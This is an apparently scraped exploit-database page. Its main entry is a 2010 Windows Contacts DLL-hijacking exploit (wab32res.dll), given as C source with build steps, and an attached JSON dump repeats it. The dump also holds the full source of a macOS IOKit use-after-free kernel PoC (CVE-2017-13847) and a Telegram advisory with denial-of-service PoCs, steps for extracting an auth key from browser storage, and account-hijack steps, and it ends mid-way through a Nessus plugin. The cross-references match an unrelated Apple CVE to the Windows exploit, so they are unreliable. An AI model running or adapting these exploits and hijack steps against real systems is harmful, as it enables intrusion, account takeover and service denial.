Search...

Microsoft Windows Contacts DLL Hijacking Exploit (wab32res.dll)

2010-08-25T00:00:00

ID 1337DAY-ID-13847
Type zdt
Reporter sToRm
Modified 2010-08-25T00:00:00

Description

Exploit for windows platform in category local exploits

                                        
                                            ===============================================================
Microsoft Windows Contacts DLL Hijacking Exploit (wab32res.dll)
===============================================================

/*

Exploit Title: Microsoft Windows Contacts DLL Hijacking Exploit (wab32res.dll)
Date: August 25, 2010
Author: storm ([email protected])
Tested on: Windows Vista SP2

http://www.gonullyourself.org/

gcc -shared -o wab32res.dll Contacts-DLL.c

.contact, .group, .p7c, .vcf, and .wab files are affected.

*/

#include &lt;windows.h&gt;

int hax()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
  hax();
  return 0;
}



#  0day.today [2018-03-13]  #

JSON Vulners Source

Initial Source

{"published": "2010-08-25T00:00:00", "id": "1337DAY-ID-13847", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-19T01:31:33", "bulletin": {"published": "2010-08-25T00:00:00", "id": "1337DAY-ID-13847", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 9.0, "modified": "2016-04-19T01:31:33"}}, "hash": "9131d8c9413d6b8d65aff683c673cabc85eb591aa6b67881495e4d16409d8b6e", "description": "Exploit for windows platform in category local exploits", "type": "zdt", "lastseen": "2016-04-19T01:31:33", "edition": 1, "title": "Microsoft Windows Contacts DLL Hijacking Exploit (wab32res.dll)", "href": "http://0day.today/exploit/description/13847", "modified": "2010-08-25T00:00:00", "bulletinFamily": "exploit", "viewCount": 1, "cvelist": [], "sourceHref": "http://0day.today/exploit/13847", "references": [], "reporter": "sToRm", "sourceData": "===============================================================\r\nMicrosoft Windows Contacts DLL Hijacking Exploit (wab32res.dll)\r\n===============================================================\r\n\r\n/*\r\n\r\nExploit Title: Microsoft Windows Contacts DLL Hijacking Exploit (wab32res.dll)\r\nDate: August 25, 2010\r\nAuthor: storm (storm@gonullyourself.org)\r\nTested on: Windows Vista SP2\r\n\r\nhttp://www.gonullyourself.org/\r\n\r\ngcc -shared -o wab32res.dll Contacts-DLL.c\r\n\r\n.contact, .group, .p7c, .vcf, and .wab files are affected.\r\n\r\n*/\r\n\r\n#include <windows.h>\r\n\r\nint hax()\r\n{\r\n WinExec(\"calc\", 0);\r\n exit(0);\r\n return 0;\r\n}\r\n\r\nBOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)\r\n{\r\n hax();\r\n return 0;\r\n}\r\n\r\n\n\n# 0day.today [2016-04-19] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0e3b1f4b49766f81f68ff12ae5eba4e8", "key": "href"}, {"hash": "832dc651bcf282322a0115614fe24b5d", "key": "sourceData"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "90b24a26b4d80733b1e9ed644454c615", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "c1ad624fe27bce446773752e816ede6b", "key": "sourceHref"}, {"hash": "b99fcfac0895024e7e6090a65051a198", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "3aa73750dff5f1c896c4435c28429fd5", "key": "description"}, {"hash": "a1a359113e1b9ea9903ce8b9821be6aa", "key": "title"}, {"hash": "b99fcfac0895024e7e6090a65051a198", "key": "modified"}], "objectVersion": "1.0"}}], "description": "Exploit for windows platform in category local exploits", "hash": "a865f6d1051416c5d67d5a2281538e951edef19a370cce6c51dd708c57eaa990", "enchantments": {"score": {"value": 7.0, "vector": "NONE", "modified": "2018-03-13T23:17:30"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-13847"]}, {"type": "seebug", "idList": ["SSV:96988"]}, {"type": "zdt", "idList": ["1337DAY-ID-29201", "1337DAY-ID-24354"]}, {"type": "exploitdb", "idList": ["EDB-ID:43326"]}, {"type": "nessus", "idList": ["MACOSX_SECUPD2017-005.NASL", "MACOS_10_13_2.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310812401", "OPENVAS:1361412562310804489"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:13847", "SECURITYVULNS:VULN:6480"]}], "modified": "2018-03-13T23:17:30"}, "vulnersScore": 7.0}, "type": "zdt", "lastseen": "2018-03-13T23:17:30", "edition": 2, "title": "Microsoft Windows Contacts DLL Hijacking Exploit (wab32res.dll)", "href": "https://0day.today/exploit/description/13847", "modified": "2010-08-25T00:00:00", "bulletinFamily": "exploit", "viewCount": 2, "cvelist": [], "sourceHref": "https://0day.today/exploit/13847", "references": [], "reporter": "sToRm", "sourceData": "===============================================================\r\nMicrosoft Windows Contacts DLL Hijacking Exploit (wab32res.dll)\r\n===============================================================\r\n\r\n/*\r\n\r\nExploit Title: Microsoft Windows Contacts DLL Hijacking Exploit (wab32res.dll)\r\nDate: August 25, 2010\r\nAuthor: storm ([email\u00a0protected])\r\nTested on: Windows Vista SP2\r\n\r\nhttp://www.gonullyourself.org/\r\n\r\ngcc -shared -o wab32res.dll Contacts-DLL.c\r\n\r\n.contact, .group, .p7c, .vcf, and .wab files are affected.\r\n\r\n*/\r\n\r\n#include <windows.h>\r\n\r\nint hax()\r\n{\r\n WinExec(\"calc\", 0);\r\n exit(0);\r\n return 0;\r\n}\r\n\r\nBOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)\r\n{\r\n hax();\r\n return 0;\r\n}\r\n\r\n\n\n# 0day.today [2018-03-13] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "3aa73750dff5f1c896c4435c28429fd5", "key": "description"}, {"hash": "e87d1c8f129a58f04530265af0a45312", "key": "href"}, {"hash": "b99fcfac0895024e7e6090a65051a198", "key": "modified"}, {"hash": "b99fcfac0895024e7e6090a65051a198", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "90b24a26b4d80733b1e9ed644454c615", "key": "reporter"}, {"hash": "cf2acdfea7d508d2fef267596e02fe36", "key": "sourceData"}, {"hash": "9ac8c9965bf654526ef69b1c4dbe9879", "key": "sourceHref"}, {"hash": "a1a359113e1b9ea9903ce8b9821be6aa", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}

{"cve": [{"lastseen": "2019-09-26T11:37:37", "bulletinFamily": "NVD", "description": "An issue was discovered in certain Apple products. iOS before 11.2 is affected. macOS before 10.13.2 is affected. The issue involves the \"IOKit\" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.", "modified": "2017-12-28T16:38:00", "id": "CVE-2017-13847", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-13847", "published": "2017-12-25T21:29:00", "title": "CVE-2017-13847", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-12-25T18:34:50", "bulletinFamily": "exploit", "description": "IOTimeSyncClockManagerUserClient provides the userspace interface for the IOTimeSyncClockManager IOService.\r\n\r\nIOTimeSyncClockManagerUserClient overrides the IOUserClient::clientClose method but it treats it like a destructor.\r\nIOUserClient::clientClose is not a destructor and plays no role in the lifetime management of an IOKit object.\r\n\r\nIt is perfectly possible to call ::clientClose (via io_service_close) in one thread and call an external method in another\r\nthread at the same time.\r\n\r\nIOTimeSyncClockManagerUserClient::clientClose drops references on a bunch of OSArrays causing them to be free'd,\r\nit also destroys the locks which are supposed to protect access to those arrays. This leads directly to multiple UaFs\r\nif you also call external methods which manipulate those arrays in other threads.\r\n\r\nFor an exploit some care would be required to ensure correct interleaving such that the OSArray was destroyed and then\r\nused *before* the lock which is supposed to be protecting the array is also destroyed, but it would be quite possible.\r\n\r\nTested on MacOS 10.13 (17A365) on MacBookAir5,2", "modified": "2017-12-15T00:00:00", "published": "2017-12-15T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96988", "id": "SSV:96988", "type": "seebug", "title": "MacOS/iOS multiple kernel UAFs due to incorrect IOKit object lifetime management in IOTimeSyncClockManagerUserClient(CVE-2017-13847)", "sourceData": "\n // ianbeer\r\n// build: clang -o timesync_uaf timesync_uaf.c -framework IOKit -lpthread\r\n// repro: while true; do ./timesync_uaf; done\r\n\r\n#if 0\r\nMacOS multiple kernel UAFs due to incorrect IOKit object lifetime management in IOTimeSyncClockManagerUserClient\r\n\r\nIOTimeSyncClockManagerUserClient provides the userspace interface for the IOTimeSyncClockManager IOService.\r\n\r\nIOTimeSyncClockManagerUserClient overrides the IOUserClient::clientClose method but it treats it like a destructor.\r\nIOUserClient::clientClose is not a destructor and plays no role in the lifetime management of an IOKit object.\r\n\r\nIt is perfectly possible to call ::clientClose (via io_service_close) in one thread and call an external method in another\r\nthread at the same time.\r\n\r\nIOTimeSyncClockManagerUserClient::clientClose drops references on a bunch of OSArrays causing them to be free'd,\r\nit also destroys the locks which are supposed to protect access to those arrays. This leads directly to multiple UaFs\r\nif you also call external methods which manipulate those arrays in other threads.\r\n\r\nFor an exploit some care would be required to ensure correct interleaving such that the OSArray was destroyed and then\r\nused *before* the lock which is supposed to be protecting the array is also destroyed, but it would be quite possible.\r\n\r\nTested on MacOS 10.13 (17A365) on MacBookAir5,2\r\n#endif\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <pthread.h>\r\n\r\n#include <mach/mach.h>\r\n\r\n#include <IOKit/IOKitLib.h>\r\n\r\nint go = 0;\r\n\r\nvoid* thread_func(void* arg) {\r\n io_object_t conn = (io_object_t)arg;\r\n go = 1;\r\n\r\n IOServiceClose(conn);\r\n return 0;\r\n}\r\n\r\nint main(int argc, char** argv){\r\n kern_return_t err;\r\n\r\n io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching(\"IOTimeSyncClockManager\"));\r\n\r\n if (service == IO_OBJECT_NULL){\r\n printf(\"unable to find service\\n\");\r\n return 0;\r\n }\r\n\r\n io_connect_t conn = MACH_PORT_NULL;\r\n err = IOServiceOpen(service, mach_task_self(), 0, &conn);\r\n if (err != KERN_SUCCESS){\r\n printf(\"unable to get user client connection\\n\");\r\n return 0;\r\n }\r\n \r\n pthread_t thread;\r\n pthread_create(&thread, NULL, thread_func, (void*)conn);\r\n\r\n while(!go){;}\r\n\r\n uint64_t inputScalar[16]; \r\n uint64_t inputScalarCnt = 0;\r\n\r\n char inputStruct[4096];\r\n size_t inputStructCnt = 0;\r\n\r\n uint64_t outputScalar[16];\r\n uint32_t outputScalarCnt = 1;\r\n\r\n char outputStruct[4096];\r\n size_t outputStructCnt = 0;\r\n \r\n err = IOConnectCallMethod(\r\n conn,\r\n 1,\r\n inputScalar,\r\n inputScalarCnt,\r\n inputStruct,\r\n inputStructCnt,\r\n outputScalar,\r\n &outputScalarCnt,\r\n outputStruct,\r\n &outputStructCnt); \r\n\r\n printf(\"%x\\n\", err);\r\n\r\n return 0;\r\n}\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96988", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-03-20T05:18:42", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category dos / poc", "modified": "2017-12-12T00:00:00", "published": "2017-12-12T00:00:00", "href": "https://0day.today/exploit/description/29201", "id": "1337DAY-ID-29201", "title": "macOS / iOS - Multiple Kernel Use-After-Frees due to Incorrect IOKit Object Lifetime Management in I", "type": "zdt", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1377 \r\n \r\n IOTimeSyncClockManagerUserClient provides the userspace interface for the IOTimeSyncClockManager IOService. \r\n \r\n IOTimeSyncClockManagerUserClient overrides the IOUserClient::clientClose method but it treats it like a destructor. \r\n IOUserClient::clientClose is not a destructor and plays no role in the lifetime management of an IOKit object. \r\n \r\n It is perfectly possible to call ::clientClose (via io_service_close) in one thread and call an external method in another \r\n thread at the same time. \r\n \r\n IOTimeSyncClockManagerUserClient::clientClose drops references on a bunch of OSArrays causing them to be free'd, \r\n it also destroys the locks which are supposed to protect access to those arrays. This leads directly to multiple UaFs \r\n if you also call external methods which manipulate those arrays in other threads. \r\n \r\n For an exploit some care would be required to ensure correct interleaving such that the OSArray was destroyed and then \r\n used *before* the lock which is supposed to be protecting the array is also destroyed, but it would be quite possible. \r\n \r\n Tested on MacOS 10.13 (17A365) on MacBookAir5,2 \r\n */ \r\n \r\n // ianbeer \r\n // build: clang -o timesync_uaf timesync_uaf.c -framework IOKit -lpthread \r\n // repro: while true; do ./timesync_uaf; done \r\n \r\n #if 0 \r\n MacOS multiple kernel UAFs due to incorrect IOKit object lifetime management in IOTimeSyncClockManagerUserClient \r\n \r\n IOTimeSyncClockManagerUserClient provides the userspace interface for the IOTimeSyncClockManager IOService. \r\n \r\n IOTimeSyncClockManagerUserClient overrides the IOUserClient::clientClose method but it treats it like a destructor. \r\n IOUserClient::clientClose is not a destructor and plays no role in the lifetime management of an IOKit object. \r\n \r\n It is perfectly possible to call ::clientClose (via io_service_close) in one thread and call an external method in another \r\n thread at the same time. \r\n \r\n IOTimeSyncClockManagerUserClient::clientClose drops references on a bunch of OSArrays causing them to be free'd, \r\n it also destroys the locks which are supposed to protect access to those arrays. This leads directly to multiple UaFs \r\n if you also call external methods which manipulate those arrays in other threads. \r\n \r\n For an exploit some care would be required to ensure correct interleaving such that the OSArray was destroyed and then \r\n used *before* the lock which is supposed to be protecting the array is also destroyed, but it would be quite possible. \r\n \r\n Tested on MacOS 10.13 (17A365) on MacBookAir5,2\n\n# 0day.today [2018-03-20] #", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/29201"}, {"lastseen": "2018-01-05T13:26:04", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category dos / poc", "modified": "2015-10-04T00:00:00", "published": "2015-10-04T00:00:00", "id": "1337DAY-ID-24354", "href": "https://0day.today/exploit/description/24354", "type": "zdt", "title": "Telegram Denial Of Service / Bypass Limit Vulnerabilities", "sourceData": "#[+] Title: Telegram - Multiple Vulnerabilities\r\n#[+] Product: Telegram\r\n#[+] Vendor: http://telegram.org/\r\n#[+] SoftWare Link : https://web.telegram.org / https://my.telegram.org\r\n#\r\n# Author : Eduardo Alves\r\n# E-Mail : edudx1[ at ]gmail[ dot ]com\r\n# Website : tempest.com.br/en/\r\n\r\n\r\n\r\nInfo:\r\nAs we know, the Telegram access uses by default is possible only with a\r\ntoken (5 digits).\r\nThis token could be obtained by: Eavesdropping/desktop\r\nnotifications/SMS/incoming calls...\r\n\r\n\r\n\r\n###################################################################################\r\n#[1] my.telegram.org Denial Of Service\r\n\r\n The my.telegram.org website behaves inadequately, blocking the users\r\naccess after 5 consecutive incorrect phone number attempts.\r\n\r\n\r\n## PoC:\r\n---------------------------------------------------------------------------------\r\nPOST /auth/send_password HTTP/1.1\r\nHost: my.telegram.org\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nReferer: https://my.telegram.org/auth\r\n\r\n\r\nphone=%2B55818888888\r\n---------------------------------------------------------------------------------\r\n###################################################################################\r\n\r\n#[2] Bypass 5 minutes limit to input token\r\n\r\nAfter the web.telegram.org asks for a new token, we have 5 minutes to send\r\nit.\r\nSo, just use Telegram-CLI and you can bypass this\r\n\r\n\r\n## PoC:\r\n---------------------------------------------------------------------------------\r\nTelegram-cli version 1.3.3, Copyright (C) 2013-2015 Vitaly Valtman\r\nTelegram-cli comes with ABSOLUTELY NO WARRANTY; for details type\r\n`show_license'.\r\nThis is free software, and you are welcome to redistribute it\r\nunder certain conditions; type `show_license' for details.\r\nTelegram-cli uses libtgl version 2.0.3\r\nTelegram-cli includes software developed by the OpenSSL Project\r\nfor use in the OpenSSL Toolkit. (http://www.openssl.org/)\r\nTelegram-cli uses libpython version 2.7.6\r\nI: config dir=[/home/ubuntu/.telegram-cli]\r\nphone number: +558888888888\r\ncode ('call' for phone call): <----- ex: You can put after 24 hours\r\n---------------------------------------------------------------------------------\r\n###################################################################################\r\n\r\n#[3] Telegram Denial Of Service in token request\r\n\r\nBy submitting incorret code attempts, a normal user can't ask for a new\r\ncode for an indetermined period of time.\r\n\r\n\r\n## PoC:\r\n---------------------------------------------------------------------------------\r\nTelegram-cli version 1.3.3, Copyright (C) 2013-2015 Vitaly Valtman\r\nTelegram-cli comes with ABSOLUTELY NO WARRANTY; for details type\r\n`show_license'.\r\nThis is free software, and you are welcome to redistribute it\r\nunder certain conditions; type `show_license' for details.\r\nTelegram-cli uses libtgl version 2.0.3\r\nTelegram-cli includes software developed by the OpenSSL Project\r\nfor use in the OpenSSL Toolkit. (http://www.openssl.org/)\r\nTelegram-cli uses libpython version 2.7.6\r\nI: config dir=[/home/ubuntu/.telegram-cli]\r\nphone number: +558388888888\r\ncode ('call' for phone call): 123123\r\n *** incorrect code\r\ncode ('call' for phone call): 123123\r\n *** incorrect code\r\ncode ('call' for phone call): 123123\r\n *** incorrect code\r\ncode ('call' for phone call): 123123\r\n *** incorrect code\r\ncode ('call' for phone call): 123123\r\n *** incorrect code\r\ncode ('call' for phone call): 123123\r\n *** incorrect code\r\ncode ('call' for phone call): 123123\r\n *** incorrect code\r\n---------------------------------------------------------------------------------\r\nError: In web.telegram.org\r\n---------------------------------------------------------------------------------\r\nMethod: auth.signIn\r\nResult:\r\n{\"_\":\"rpc_error\",\"error_code\":420,\"error_message\":\"FLOOD_WAIT_86129\"}\r\nStack: Error\r\n at h (https://web.telegram.org/js/app.js:16:26020)\r\n at https://web.telegram.org/js/app.js:16:27238\r\n at l (https://web.telegram.org/js/app.js:8:6393)\r\n at https://web.telegram.org/js/app.js:8:6565\r\n at u.$eval (https://web.telegram.org/js/app.js:8:13762)\r\n at u.$digest (https://web.telegram.org/js/app.js:8:12258)\r\n at https://web.telegram.org/js/app.js:8:13847\r\n at s (https://web.telegram.org/js/app.js:7:744)\r\n at https://web.telegram.org/js/app.js:7:2742\r\n at n (https://web.telegram.org/js/app.js:2:16525)\r\n---------------------------------------------------------------------------------\r\n###################################################################################\r\n\r\n#[4] User identity validation abscence\r\n\r\nIn various scenarios web applications require session management and access\r\ncontrol mechanisms in order to enforce certain actions to be carried out,\r\nexclusively, by certified/authorized personnel.\r\nIn web.telegram.org, this management control is implemented through Local\r\nStorage. However, there is a possibility of an attacker \u2014 who possesses\r\nvalid dc1_auth_key from the victim \u2014 to access the application alongside\r\nthe true user of the given account.\r\n\r\nEx: Firefox\r\n---------------------------------------------------------------------------------\r\nsqlite3 -header -separator \" \" webappsstore.sqlite \"select * from\r\nwebappsstore2;\" > out.txt; cat out.txt | grep dc1_aut\r\ngro.margelet.bew.:https:443 dc1_auth_key\r\n\"ccccccccccccc14c18f5b5eab567b23e30a9ffa803027f8ff7c763bb5bbf9bd9908ac5ff53c718b1c8d7b7f9b040956184ca7748cfdaed5eeec071cdbc18cb06151b83ad8edd8febf2c6832b875627e1467c8dd4c612cda4df63cdf95129c960e6521806e12debc3b96846acf668b74c32f3f1f8ad820a60de836316523549cccccccccccccccccc9ec6ec38fd619752d1ed145427dd7600af2312ab493ebebadf6b1effb6e11764887d5c8a679cc371797f92d284dc54c35fb578c41ca61222d7781485cccccccccccccccccccccccca96a97f8dced0a793c80cbd4ed064bb95ea63e69ed912ccf94c53f7563cb27346ccccccccccccccccccc6fd0492db\r\n---------------------------------------------------------------------------------\r\n###################################################################################\r\n\r\n#[5] Hijacking account and importing contacts\r\n\r\nIf the victim uses only the passcode as two-step verification, we can reset\r\nher account, and as a result, the attacker creates the possibility for\r\nimporting contacts and hijacking the account:\r\n\r\n\r\n- Attacker asks for token using Telegram-Web\r\n- Obtains the code\r\n- Resets account\r\n- Waits for the victim to log-in\r\n- Imports contacts (auto)\r\n- Kills the victim's session\r\n- Enables Two-Step verification (passcode + email)\r\n\r\n\r\n\r\nThanks to:\r\n\r\nLeandro Oliveira\r\nJoaquim Brasil\r\nMarcelo Pessoa\r\nToronto Garcez\r\nTiago Barbosa\r\n\r\nFrom Tempest Security Intelligence\n\n# 0day.today [2018-01-05] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/24354"}], "exploitdb": [{"lastseen": "2017-12-12T21:04:20", "bulletinFamily": "exploit", "description": "macOS/iOS - Multiple Kernel Use-After-Frees due to Incorrect IOKit Object Lifetime Management in IOTimeSyncClockManagerUserClient. CVE-2017-13847. Dos exploi...", "modified": "2017-12-12T00:00:00", "published": "2017-12-12T00:00:00", "id": "EDB-ID:43326", "href": "https://www.exploit-db.com/exploits/43326/", "type": "exploitdb", "title": "macOS/iOS - Multiple Kernel Use-After-Frees due to Incorrect IOKit Object Lifetime Management in IOTimeSyncClockManagerUserClient", "sourceData": "/*\r\nSource: https://bugs.chromium.org/p/project-zero/issues/detail?id=1377\r\n\r\nIOTimeSyncClockManagerUserClient provides the userspace interface for the IOTimeSyncClockManager IOService.\r\n\r\nIOTimeSyncClockManagerUserClient overrides the IOUserClient::clientClose method but it treats it like a destructor.\r\nIOUserClient::clientClose is not a destructor and plays no role in the lifetime management of an IOKit object.\r\n\r\nIt is perfectly possible to call ::clientClose (via io_service_close) in one thread and call an external method in another\r\nthread at the same time.\r\n\r\nIOTimeSyncClockManagerUserClient::clientClose drops references on a bunch of OSArrays causing them to be free'd,\r\nit also destroys the locks which are supposed to protect access to those arrays. This leads directly to multiple UaFs\r\nif you also call external methods which manipulate those arrays in other threads.\r\n\r\nFor an exploit some care would be required to ensure correct interleaving such that the OSArray was destroyed and then\r\nused *before* the lock which is supposed to be protecting the array is also destroyed, but it would be quite possible.\r\n\r\nTested on MacOS 10.13 (17A365) on MacBookAir5,2\r\n*/\r\n\r\n// ianbeer\r\n// build: clang -o timesync_uaf timesync_uaf.c -framework IOKit -lpthread\r\n// repro: while true; do ./timesync_uaf; done\r\n\r\n#if 0\r\nMacOS multiple kernel UAFs due to incorrect IOKit object lifetime management in IOTimeSyncClockManagerUserClient\r\n\r\nIOTimeSyncClockManagerUserClient provides the userspace interface for the IOTimeSyncClockManager IOService.\r\n\r\nIOTimeSyncClockManagerUserClient overrides the IOUserClient::clientClose method but it treats it like a destructor.\r\nIOUserClient::clientClose is not a destructor and plays no role in the lifetime management of an IOKit object.\r\n\r\nIt is perfectly possible to call ::clientClose (via io_service_close) in one thread and call an external method in another\r\nthread at the same time.\r\n\r\nIOTimeSyncClockManagerUserClient::clientClose drops references on a bunch of OSArrays causing them to be free'd,\r\nit also destroys the locks which are supposed to protect access to those arrays. This leads directly to multiple UaFs\r\nif you also call external methods which manipulate those arrays in other threads.\r\n\r\nFor an exploit some care would be required to ensure correct interleaving such that the OSArray was destroyed and then\r\nused *before* the lock which is supposed to be protecting the array is also destroyed, but it would be quite possible.\r\n\r\nTested on MacOS 10.13 (17A365) on MacBookAir5,2\r\n#endif\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <pthread.h>\r\n\r\n#include <mach/mach.h>\r\n\r\n#include <IOKit/IOKitLib.h>\r\n\r\nint go = 0;\r\n\r\nvoid* thread_func(void* arg) {\r\n io_object_t conn = (io_object_t)arg;\r\n go = 1;\r\n\r\n IOServiceClose(conn);\r\n return 0;\r\n}\r\n\r\nint main(int argc, char** argv){\r\n kern_return_t err;\r\n\r\n io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching(\"IOTimeSyncClockManager\"));\r\n\r\n if (service == IO_OBJECT_NULL){\r\n printf(\"unable to find service\\n\");\r\n return 0;\r\n }\r\n\r\n io_connect_t conn = MACH_PORT_NULL;\r\n err = IOServiceOpen(service, mach_task_self(), 0, &conn);\r\n if (err != KERN_SUCCESS){\r\n printf(\"unable to get user client connection\\n\");\r\n return 0;\r\n }\r\n \r\n pthread_t thread;\r\n pthread_create(&thread, NULL, thread_func, (void*)conn);\r\n\r\n while(!go){;}\r\n\r\n uint64_t inputScalar[16]; \r\n uint64_t inputScalarCnt = 0;\r\n\r\n char inputStruct[4096];\r\n size_t inputStructCnt = 0;\r\n\r\n uint64_t outputScalar[16];\r\n uint32_t outputScalarCnt = 1;\r\n\r\n char outputStruct[4096];\r\n size_t outputStructCnt = 0;\r\n \r\n err = IOConnectCallMethod(\r\n conn,\r\n 1,\r\n inputScalar,\r\n inputScalarCnt,\r\n inputStruct,\r\n inputStructCnt,\r\n outputScalar,\r\n &outputScalarCnt,\r\n outputStruct,\r\n &outputStructCnt); \r\n\r\n printf(\"%x\\n\", err);\r\n\r\n return 0;\r\n}", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/43326/"}], "nessus": [{"lastseen": "2019-11-17T18:49:06", "bulletinFamily": "scanner", "description": "The remote host is running Mac OS X 10.11.6 or Mac OS X 10.12.6 and is\nmissing a security update. It is therefore, affected by multiple\nvulnerabilities affecting the following components :\n\n - apache\n - curl\n - IOAcceleratorFamily\n - IOKit\n - Kernel\n - OpenSSL\n - Screen Sharing Server", "modified": "2019-11-02T00:00:00", "id": "MACOSX_SECUPD2017-005.NASL", "href": "https://www.tenable.com/plugins/nessus/105081", "published": "2017-12-07T00:00:00", "title": "macOS and Mac OS X Multiple Vulnerabilities (Security Update 2017-002 and 2017-005)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105081);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\n \"CVE-2017-3735\",\n \"CVE-2017-7154\",\n \"CVE-2017-7158\",\n \"CVE-2017-7159\",\n \"CVE-2017-7162\",\n \"CVE-2017-7172\",\n \"CVE-2017-7173\",\n \"CVE-2017-9798\",\n \"CVE-2017-12837\",\n \"CVE-2017-13847\",\n \"CVE-2017-13855\",\n \"CVE-2017-13862\",\n \"CVE-2017-13867\",\n \"CVE-2017-13868\",\n \"CVE-2017-13869\",\n \"CVE-2017-13872\",\n \"CVE-2017-13904\",\n \"CVE-2017-15422\",\n \"CVE-2017-1000254\"\n );\n script_bugtraq_id(\n 100515,\n 100860,\n 100872,\n 101115,\n 101981,\n 102097,\n 102098,\n 102100,\n 103134,\n 103135\n );\n\n script_name(english:\"macOS and Mac OS X Multiple Vulnerabilities (Security Update 2017-002 and 2017-005)\");\n script_summary(english:\"Checks for the presence of Security Update 2017-002 / 2017-005.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a macOS or Mac OS X security update that\nfixes multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running Mac OS X 10.11.6 or Mac OS X 10.12.6 and is\nmissing a security update. It is therefore, affected by multiple\nvulnerabilities affecting the following components :\n\n - apache\n - curl\n - IOAcceleratorFamily\n - IOKit\n - Kernel\n - OpenSSL\n - Screen Sharing Server\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT208331\");\n script_set_attribute(attribute:\"solution\", value:\n\"Install Security Update 2017-005 or later for 10.11.x or\nSecurity Update 2017-002 or later for 10.12.x.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-7172\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mac OS X Root Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:macos\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"Host/MacOSX/packages/boms\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n# Compare 2 patch numbers to determine if patch requirements are satisfied.\n# Return true if this patch or a later patch is applied\n# Return false otherwise\nfunction check_patch(year, number)\n{\n 